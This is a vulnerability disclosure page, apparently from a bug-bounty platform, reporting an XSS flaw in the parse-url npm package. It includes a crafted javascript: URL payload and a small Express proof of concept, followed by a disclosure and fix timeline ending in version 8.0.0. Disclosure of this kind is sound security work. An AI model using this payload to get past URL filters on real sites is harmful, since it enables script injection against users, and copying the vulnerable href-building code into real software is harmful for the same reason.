xss via improper parsing of javascript: url in ionicabizau/parse-url

Valid

Reported on

Jul 18th 2022

Description

A URL like javascript://e[xamp]le.com%0aalert(1) will get incorrectly recognised as a file: protocol. It has nothing to do with escaping as the common characters such as &, >, <, " and ' are not present in the URL

Proof of Concept

const parseUrl = require("parse-url"); 
const express = require('express');
const app = express();

parsed = parseUrl("javascript://e[xamp]le.com%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);

Impact

XSS

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 10 months ago

We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 10 months ago

We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 10 months ago

Ionică Bizău (Johnny B.) validated this vulnerability 10 months ago

Hi! Thank you for this finding!

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 10 months ago

Ionică Bizău (Johnny B.) marked this as fixed in 8.0.0 with commit b88c81 10 months ago

Ionică Bizău (Johnny B.) has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation